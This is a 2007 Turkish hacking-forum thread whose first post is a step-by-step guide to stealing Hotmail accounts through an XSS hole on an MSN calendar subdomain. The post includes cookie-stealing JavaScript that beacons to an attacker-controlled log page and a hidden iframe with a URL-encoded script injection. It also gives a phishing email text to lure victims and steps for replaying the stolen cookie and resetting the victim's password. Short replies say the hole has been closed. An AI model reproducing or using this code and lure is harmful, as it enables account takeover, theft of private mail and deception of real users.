|
Eskiler (Arşiv) Eski konular |
|
Konu Seçenekleri | Görünüm Şekli |
|
05-27-2007, 09:15 PM | #1 |
Forum Aşığı
Kayit Tarihi: Feb 2007
Nerden: ¢αкαℓ.ηєттєη
Yaş: 30
Mesajlari: 4,929
Teşekkür Etme: 235 Teşekkür Edilme: 266 Teşekkür Aldığı Konusu: 182
Üye No: 31562
Rep Power: 2365
Rep Puanı : 11542
Rep Derecesi :
Cinsiyet : Erkek
|
msn hackle xss açığı ile+resimli anlatım
Mail Hack’in en qüzel yöntemlerinden olan Hotmail XSS açığını anlatalım..
Öncelikle dosyalarımızı rar’a attığım şekilde kendi hostumuza atıyoruz..Ve bu dosyaları kendi sitemize qöre editliyoruz.. ama ilk önce dosyalar arasında "c.js" var.. bunu not defterinde açın ve ; i=new/**/Image();i.src= "http://www.volqan.org/portal/sistem/s.php? +">i=new/**/Image();i.src= "http://www.volqan.org/portal/log.php? +"> şu kısmı bulup " voLqan.Org " linkini kendi sitenizin adıyla editleyin ve bu şekilde kaydedin.. Daha sonra tüm dosyaları rar’ladığım şekilde hostunuza atın.. Detaya inmek istiyorum dosyanın içinde log.php dosyasını yani portal/system/log.php’yi kendinize qöre editleyebilirisiniz.. Mesela orda snif’ten cookie bilqilerini almak için kullanıcı adı ve şifre " admin - voLqan " şeklinde.. Yani ; $kullaniciadi = "admin"; $sifre = "voLqan"; bunu kendinize qöre uyarlayabilirsiniz.. Böylece cookie’leri aldığınız log sayfası yalnızca size ait olur ve her qirişte " kullanıcı adı - şifre " ister.. Bu dosyamızı da kendimize qöre ayarladıktan sonra sıra qeldi XSS’mizi kullanmaya.. Bu XSS’i kendi sitemde " portal " klasörüne kurduğumu düşünürsem, kurbana yollayacağım link ; www.volqan.org/portal olacaktır.. Çünkü o klasöre attığım index.html’deki kod yani ; **********document.write(’<iframe name="I1" src= "a target=_blank href=http://calendar.msn.com/tasks/isapi">http://calendar.msn.com/tasks/isapi.dll?request=action&operation=expandcollapse& objectID=0&itemOldStatus=0&httpFrom=“><%53%43%52%4 9%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77% 77%2E%6B%67%73%63%65%6E%74%65%72%2E%6F%72%67%2F%70 %6F%72%74%61%6C%2F%63%2E%6A%73><%2F%53%43%52%49%50 %54>" height="1" width="1" border="0" frameborder="0" marginwidth="1" marginheight="1" style="position: absolute; left: 0; top: 0"> hi</iframe>’) window.status=" " </script> bu kod kurban’ın bu sayfayı qörmesi halinde cookie bilqilerinin elime qeçmesini sağlayacaktır.. kurbanımı seçiyorum ve ona kendi mail hesabımdan şöyle bir mail qönderiyorum.. Konu : yeni portal nasıl olmuş Kimden : [email protected] Konu : merhaba arkadaşım voLqan.Org’a qüzel bir portal kurdum seninde yorumlarını bekliyorum.. www.volqan.org/portal Sağ alt taraftaki kategoriye iyi baq seninde adın qeciyor.. Teşekkürler.. qibisinden kurbana mailimi yolluyorum Kurbanımız bu iletiyi alıp verdiğim linke qirdiği anda yani Hotmail box’ı açık iken www.volqan.org/portal kısmına qirdiği anda Cookie’leri bizim log’umuzda beliriyor ve bende hemen www.voLqan.Org/portal/sistem/log.php? adresime qidip cookie’leri kontrol ediyorum.. ve qördüğünüz qibi kurbanın cookie bilqileri qelmiş şimdi ordaki KOPYALA kutucuğunu tıklaıp cookie’i kopyalıyorum ve proxomitron proqramıma qirip son ayarlarımı yapıyorum http://img295.imageshack.us/img295/4183/sniffzv5.jpg ve son olarak proxy ayarlarını yaptıktan sonra aldığımız cookie ile http://by103fd.bay103.hotmail.msn.co...hmhome?fti=yes linkinden kurbanın mailine qiriş yapıyoruz..Şifreyi kendimize qöre ayarlamak içinde www.passport.com dan şifre resetleme linkini yolluyoruz ve mail box açıkken şifreyi resetleyip kendimize qöre ayarlıyoruz.. Proxomitron Download Hotmail XSS Dosyaları Download işte Hotmail XSS mevzusu bundan ibaret..Yalnız Hotmail XSS acığı kapandı qibi laflar ortada dolaşıyor.. Hotmail’de XSS bulmak bizim elimizde yani mesela bu verdiğim XSS acığı calendar.hotmail..’den kaynaklanıyor ama hotmail’de bir sürü sub var ve bu sub’larda bir sürü XSS acığı mevcut her qeçen qün ayrı bir sub’da XSS bulunuyor ve bizde bunu mail hack olarak kullanıyoruz..
__________________
:wink:
|
05-31-2007, 01:32 AM | #2 |
Yeni Üye
Kayit Tarihi: Apr 2006
Yaş: 37
Mesajlari: 20
Teşekkür Etme: 1 Teşekkür Edilme: 0 Teşekkür Aldığı Konusu: 0
Üye No: 13044
Rep Power: 1328
Rep Puanı : 10
Rep Derecesi :
Cinsiyet :
|
bu acık kapatıldı
|
05-31-2007, 05:26 PM | #3 |
Yeni Üye
Kayit Tarihi: Dec 2006
Yaş: 39
Mesajlari: 33
Teşekkür Etme: 7 Teşekkür Edilme: 0 Teşekkür Aldığı Konusu: 0
Üye No: 24818
Rep Power: 1281
Rep Puanı : 10
Rep Derecesi :
Cinsiyet :
|
ewt xss kapandı
|
07-13-2007, 02:03 PM | #4 |
Daimi Üye
Kayit Tarihi: Sep 2006
Mesajlari: 917
Teşekkür Etme: 648 Teşekkür Edilme: 71 Teşekkür Aldığı Konusu: 36
Üye No: 18465
Rep Power: 1522
Rep Puanı : 4494
Rep Derecesi :
Cinsiyet : Erkek
|
alıntımı yaptın eğer yaptıysan yazının altına ALINTI'dır die eklermisinn !
__________________
. |
Bu Konudaki Online üyeler: 1 (Üye Sayisi : 0 Ziyaretçi Sayisi : 1) | |
|
|
Benzer Konular | ||||
Konu | Konu Baslangic | Forum | Cevaplar | Son Mesaj |
Rep Verme (Resimli Anlatım) | GooD aNd EvıL | Eskiler (Arşiv) | 10 | 09-11-2008 09:42 PM |
keyglorer resimli anlatım! | Tilki_Andre | Eskiler (Arşiv) | 0 | 06-12-2007 12:10 AM |
Mp3 Kücültme resimli anlatım | artemis | Eskiler (Arşiv) | 7 | 11-08-2006 01:49 PM |